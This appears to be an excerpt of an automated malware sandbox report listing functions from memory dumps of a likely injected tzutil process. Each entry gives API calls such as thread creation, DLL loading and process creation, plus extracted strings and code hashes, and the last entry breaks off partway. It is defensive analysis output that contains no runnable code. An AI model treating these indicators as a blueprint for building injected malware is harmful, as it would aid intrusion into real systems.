                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 026A1254
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416
                                                              • Opcode ID: cb65c5949d264f6dfddbe3e04f0d02becff97ea6d117dac3abb105f9e56e4b91
                                                              • Instruction ID: 1755bbc5142c04e9c76917422d4d980ce0eac0eaa03438d024d3dd11507b4b82
                                                              • Opcode Fuzzy Hash: cb65c5949d264f6dfddbe3e04f0d02becff97ea6d117dac3abb105f9e56e4b91
                                                              • Instruction Fuzzy Hash: B0118EB290024C7AEB11AAE44CD1DEFBB7DDF41A94F048158FA54B7240DA249E058FA5

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 026A1254
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416
                                                              • Opcode ID: 3ef7e33776fd51efe08ba38bed222d1d2d7fe35c9b17609095cb232add0010db
                                                              • Instruction ID: c24b85f690840e43ac52d6c5feab4302559ab2e77d186092b431d050a688125e
                                                              • Opcode Fuzzy Hash: 3ef7e33776fd51efe08ba38bed222d1d2d7fe35c9b17609095cb232add0010db
                                                              • Instruction Fuzzy Hash: EC016DB2D0024C7AEB11ABE49CD1DEF7B7DDF41694F048068FA58A7240D6345E068FA5
                                                              APIs
                                                              • Sleep.KERNELBASE(000007D0), ref: 026B3EDD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID: net.dll$wininet.dll
                                                              • API String ID: 3472027048-1269752229
                                                              • Opcode ID: c3fcf510093f2c6076039a929e9b56ab60fbd134cb2ede7f3546c4e514be9f82
                                                              • Instruction ID: b0026235dbd8e52f0d623e4d05ef2c38d8b8eb2e391b11a1e62879f16a88a991
                                                              • Opcode Fuzzy Hash: c3fcf510093f2c6076039a929e9b56ab60fbd134cb2ede7f3546c4e514be9f82
                                                              • Instruction Fuzzy Hash: 93314CB1A01605BBDB15DFA4CC84FEBBBB9EF88714F00416DE61D5B240D774AA508FA4
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InitializeUninitialize
                                                              • String ID: @J7<
                                                              • API String ID: 3442037557-2016760708
                                                              • Opcode ID: e3ac8dca9d4a5e2f21f3405cabb02933aee54d61612d24bb33dfc2b886692964
                                                              • Instruction ID: 1bddb6be18e1a2735fd2a574dc4e54cf0798e62890a327c89e56e0bdf2e6e1f6
                                                              • Opcode Fuzzy Hash: e3ac8dca9d4a5e2f21f3405cabb02933aee54d61612d24bb33dfc2b886692964
                                                              • Instruction Fuzzy Hash: 9E312176A00609AFDB10DFD8C8809EFB7B9FF88304F108559E915E7214D775AE458FA1
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InitializeUninitialize
                                                              • String ID: @J7<
                                                              • API String ID: 3442037557-2016760708
                                                              • Opcode ID: 1f689e5722081d79dd2b489bdd5053e9c44b1b93b73407c68c5540e258936cf8
                                                              • Instruction ID: c29d790fb62fc1db1d21d0bac702d9b8ca83d98bc2d24b6f613a6c166206a61e
                                                              • Opcode Fuzzy Hash: 1f689e5722081d79dd2b489bdd5053e9c44b1b93b73407c68c5540e258936cf8
                                                              • Instruction Fuzzy Hash: 24312176A00209AFDB10DFD8C8809EFB7B9FF88304B108559E915A7214D775EE458FA1
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 59613f67ab0b44fc569472441be565e37fa422d4333c6dd1dd2efb647779117c
                                                              • Instruction ID: c5448b0785062a34169db0c61eaa6052c41f1d3545f11351ff98d42712f5d6ef
                                                              • Opcode Fuzzy Hash: 59613f67ab0b44fc569472441be565e37fa422d4333c6dd1dd2efb647779117c
                                                              • Instruction Fuzzy Hash: DF219E777002455FC315CA68DC91BF9B728EB42265F100298FA15CB381EF615E16CBA5
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 026A4A02
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: aa15e0bea88f3d3eb8164487ffdb839de0913709777854031ac92b482dca4ce8
                                                              • Instruction ID: be17d272f49e3a73c2bd1a5616d256bec66ffe2e2ecd3345f5407270f56eaa31
                                                              • Opcode Fuzzy Hash: aa15e0bea88f3d3eb8164487ffdb839de0913709777854031ac92b482dca4ce8
                                                              • Instruction Fuzzy Hash: 0821ED3B6011868FCB01CE28CC51BE9FF64FF82519B2042D8D6258B346DBA29C17CF91
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 026A4A02
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                              • Instruction ID: 096cba0dcd461ca89dd7a3d07fd77cf8d71b0c8c7e88f08af3463d0df911c117
                                                              • Opcode Fuzzy Hash: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                              • Instruction Fuzzy Hash: 7C011EB5D4020DBBDB10EAE4DC41FDDB3B9AF54308F004199E90897241FA71EB54CB95
                                                              APIs
                                                              • CreateProcessInternalW.KERNELBASE(?,?,?,?,026A8724,00000010,?,?,?,00000044,?,00000010,026A8724,?,?,?), ref: 026B9BB3
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID:
                                                              • API String ID: 2186235152-0
                                                              • Opcode ID: ba0705d331adb0827d90e0a0c05e4e99946108ce1be150fedcd619b1613f899a
                                                              • Instruction ID: 36ef180f735b917ab3ae5914db448bb62dfd025186f6d4fe803a748d35185e8f
                                                              • Opcode Fuzzy Hash: ba0705d331adb0827d90e0a0c05e4e99946108ce1be150fedcd619b1613f899a
                                                              • Instruction Fuzzy Hash: B001AEB2215108BBCB04DE99DC90EEB77ADAF8D754F108208BA09A3240D630F8518BA4
                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02699F62
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                              • Opcode ID: c463900b9fbcea7865d729dbd8ce692ca1e0d4df9bad2f7c5cf101c691f30119
                                                              • Instruction ID: bafad0b70d6919f3bd72bf6fed7ddaccdc870d6af15f9d5ad11060b17a6f3f07
                                                              • Opcode Fuzzy Hash: c463900b9fbcea7865d729dbd8ce692ca1e0d4df9bad2f7c5cf101c691f30119
                                                              • Instruction Fuzzy Hash: 53F0653334030437E62165E99C02FDBB79D9F85765F14001AF60CDA5C0D991F5418BA8
                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02699F62
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                              • Opcode ID: 5b05dc4f9ac00e1fb97425b4699cabbd5fdff5ea68f0ab42ae6c2005985b54c1
                                                              • Instruction ID: f7f2c4805598b37b0cfa3b6af19d0e25a0c2fd10d2d047f473b1f259fc8b8a8c
                                                              • Opcode Fuzzy Hash: 5b05dc4f9ac00e1fb97425b4699cabbd5fdff5ea68f0ab42ae6c2005985b54c1
                                                              • Instruction Fuzzy Hash: 7BF02B333403043BE73166A88C02FEBB79C8F85B50F24011DF609AF5C0C991B541CBA8
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,3777EA40,00000007,00000000,00000004,00000000,026A4211,000000F4), ref: 026B9B09
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: b80920223b0d3d6ec0276f1483e88535983c36a14dc249cb946427c0f6602cca
                                                              • Instruction ID: 63376594522d6c65a1d57d65022c7d98e2bd4e4a3768481018baf75225b2b3fc
                                                              • Opcode Fuzzy Hash: b80920223b0d3d6ec0276f1483e88535983c36a14dc249cb946427c0f6602cca
                                                              • Instruction Fuzzy Hash: 91E09A72200304BBDA20EF98DC41FAB73ADEFCAB10F004419F908A7241C630BC208BB8
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(026A1E59,?,026B5F17,026A1E59,?,026B5F17,?,026A1E59,026B59BF,00001000,?,00000000), ref: 026B9AC9
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: ac00b1638777126d2cea74cea7df9c0d5320b23dccd002bc6f264aef07eeb62c
                                                              • Instruction ID: 6795c6beda3bd6ae3fb5786cc5a56f11dff99a798c357d4246426a3ea8a4c905
                                                              • Opcode Fuzzy Hash: ac00b1638777126d2cea74cea7df9c0d5320b23dccd002bc6f264aef07eeb62c
                                                              • Instruction Fuzzy Hash: EEE09A722102087BDA14EF99DC40F9B73ADEFCAB10F004409FA08A7240CA31BD108BB8
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 026A878A
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: b2fdd7f5a1d97f55da9e9883e388d1a9d0ed00b807dd1d66f4156bc78fba80a9
                                                              • Instruction ID: 45d71b2577ae3b0f5f8e07d67cae6cc85cbdfd0ac51872c373ef1e418e5f35c9
                                                              • Opcode Fuzzy Hash: b2fdd7f5a1d97f55da9e9883e388d1a9d0ed00b807dd1d66f4156bc78fba80a9
                                                              • Instruction Fuzzy Hash: 92E086752402082BFF146AA89C55F6A33984F88638F184A50BA1CDB3C1D674F9418A54
                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00008003,?,?,026A2150,026B82FF,?,026A211B), ref: 026A8591
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 8078e4b5b8cf14619579fb5ecae74e25a8c9f02cfd6a8169a37789255bfbf125
                                                              • Instruction ID: 31d61853c25c93c2d7d0d76bba7b59c85267866077c60dc38491e11bc9bf4733
                                                              • Opcode Fuzzy Hash: 8078e4b5b8cf14619579fb5ecae74e25a8c9f02cfd6a8169a37789255bfbf125
                                                              • Instruction Fuzzy Hash: 19D05EB23403053BFA40A6E4DC53F66328E4F04655F0500A8BE0CEB3C1DA61F6008E69
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: aa3dfd325f4f7620396dc7ef3f7d1b7f674dd86422e4f7e9a578d42c235331d0
                                                              • Instruction ID: d0a1289ef338c3b805175550c68231c5d2d963a52942e3805d3145fb2e4de5dc
                                                              • Opcode Fuzzy Hash: aa3dfd325f4f7620396dc7ef3f7d1b7f674dd86422e4f7e9a578d42c235331d0
                                                              • Instruction Fuzzy Hash: 48B09B719415C5C5DE51F7604A09717790067D1705F15D062D3474646E4778C1D1F175
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284161154.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2d50000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 54c83316a2d1e38cf01f858fa1577372f4876acfbed09934fba294c8bba2248b
                                                              • Instruction ID: 675a45c21a74ca512632006586540c58ef26df6afbba9463865093f8649b0f16
                                                              • Opcode Fuzzy Hash: 54c83316a2d1e38cf01f858fa1577372f4876acfbed09934fba294c8bba2248b
                                                              • Instruction Fuzzy Hash: 9C41D37161CB1D4FDB68AF6890816B6B3E2FB49301F50052DD98AC3762EBB4EC468785
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284161154.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2d50000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                              • API String ID: 0-3558027158
                                                              • Opcode ID: 47cf9afc285d78d3c590a56293d944d5d20f980efb9425facb2a64674c5c23be
                                                              • Instruction ID: aba2e7203c6dc6af96dd32e8ad82aaadca7bea4c344b6a8bcb54bd0ae6dcc479
                                                              • Opcode Fuzzy Hash: 47cf9afc285d78d3c590a56293d944d5d20f980efb9425facb2a64674c5c23be
                                                              • Instruction Fuzzy Hash: C7A141F04483948AC7158F58A0552AFFFB1EBC6305F15816DE6E6BB243C3BE8905CB95
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 423e47ca670be69991fc0343d6bf4f15985beb76e3c72db761c95ca60265a126
                                                              • Instruction ID: 2a6b9c60259b7a4603f338e705e1ee5411fbace526a64bc915f38c5f3b2f7b7e
                                                              • Opcode Fuzzy Hash: 423e47ca670be69991fc0343d6bf4f15985beb76e3c72db761c95ca60265a126
                                                              • Instruction Fuzzy Hash: D251D6B1A40156AFDF11EB98C8809BFF7B8BB08204750E169E9ADD7641D334DE50CBA0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 9805bd6cc3901b9f7221feaf082cbaf38355206f675188b6ce4f7dab8e05a72f
                                                              • Instruction ID: 821fbfbe3cad80130c569ab5fa893862168eaab069ef68d5737977f422f0a6ea
                                                              • Opcode Fuzzy Hash: 9805bd6cc3901b9f7221feaf082cbaf38355206f675188b6ce4f7dab8e05a72f
                                                              • Instruction Fuzzy Hash: 89511575A80645AFDB70DF9CC8A097FB7F9EB44204B40D45AEB96C7681E7B4DA00CB60
                                                              Strings
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02EB4725
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02EB4742
                                                              • Execute=1, xrefs: 02EB4713
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 02EB4787
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02EB4655
                                                              • ExecuteOptions, xrefs: 02EB46A0
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02EB46FC
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 0-484625025
                                                              • Opcode ID: 6c4306ff1c07603933ee75d20192679a2a8ed15bfcb8ebcd8a8f75448a72cd30
                                                              • Instruction ID: fe0652991d69a690f9ca37ed41d77981d463c3cf1df6e45d1ad787a11cc08ee9
                                                              • Opcode Fuzzy Hash: 6c4306ff1c07603933ee75d20192679a2a8ed15bfcb8ebcd8a8f75448a72cd30
                                                              • Instruction Fuzzy Hash: FF511B316C02197AEF11AAE4DC95FEAB3B9EF04308F14A4A9E509AB1C1E7719A45CF50
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                              • Instruction ID: ea61e9a238dd718a024d2d1cfabda3a12fcf2fd0259b95b8d79d72eda457687b
                                                              • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                              • Instruction Fuzzy Hash: 78022871508341AFD309DF18C890A6FB7EAEFC4744F848A2DFA999B254DB31E905CB42
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-$0$0
                                                              • API String ID: 1302938615-699404926
                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction ID: 1151ed80f231e10d6edf2eda37e476d28ae7d72ed5faaf588dc01319cac5fe9e
                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction Fuzzy Hash: 9B81B170E852499EDF24AE68C8517FEBBA2AF4531CF18E21DE8DDE7290C7359840CB50
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$[$]:%u
                                                              • API String ID: 48624451-2819853543
                                                              • Opcode ID: 2b64f90071700d15a344eccc87e36f37fcfd67b59b77513992fb949499b7e3ba
                                                              • Instruction ID: f9ac07d2caa95eddb863f2de80980d5ab7f871a94a2c2954500a56a331c933d7
                                                              • Opcode Fuzzy Hash: 2b64f90071700d15a344eccc87e36f37fcfd67b59b77513992fb949499b7e3ba
                                                              • Instruction Fuzzy Hash: 77215E76A40119ABDB50DE79C844AEFBBE9EF44748F449126EE49E3240E730DA018BA5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284161154.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2d50000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: XQcQ$X]_Q$gURU$uZPF$vA]X$w\F[$y[N]
                                                              • API String ID: 0-1416458366
                                                              • Opcode ID: dedf437aa38687259b1bad9c904173211a3205b851b084e00ad0a60b07b74ce9
                                                              • Instruction ID: a918d2656ab4e9316a26014a986e0913c95fe2732e5753425d873f91229cc874
                                                              • Opcode Fuzzy Hash: dedf437aa38687259b1bad9c904173211a3205b851b084e00ad0a60b07b74ce9
                                                              • Instruction Fuzzy Hash: B731E2B091028CEBCF05CF94D5886DEBBB1FF04389F858559E81A6F250C771865ACB89
                                                              Strings
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02EB02BD
                                                              • RTL: Re-Waiting, xrefs: 02EB031E
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02EB02E7
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                              • API String ID: 0-2474120054
                                                              • Opcode ID: 613edf70d37f360dcc50f2a09a47e51aeb7af222924367c695289a0365051a48
                                                              • Instruction ID: 708b31bbcaa8da5e1caa50a7d5a3c771416bf90ae62365e7cd7f3458458ce61e
                                                              • Opcode Fuzzy Hash: 613edf70d37f360dcc50f2a09a47e51aeb7af222924367c695289a0365051a48
                                                              • Instruction Fuzzy Hash: 1EE1F1306887419FD725CF28D888B6BB7E1BF84358F149A5DF5A68B6D1D730E844CB42
                                                              Strings
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02EB7B7F
                                                              • RTL: Re-Waiting, xrefs: 02EB7BAC
                                                              • RTL: Resource at %p, xrefs: 02EB7B8E
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
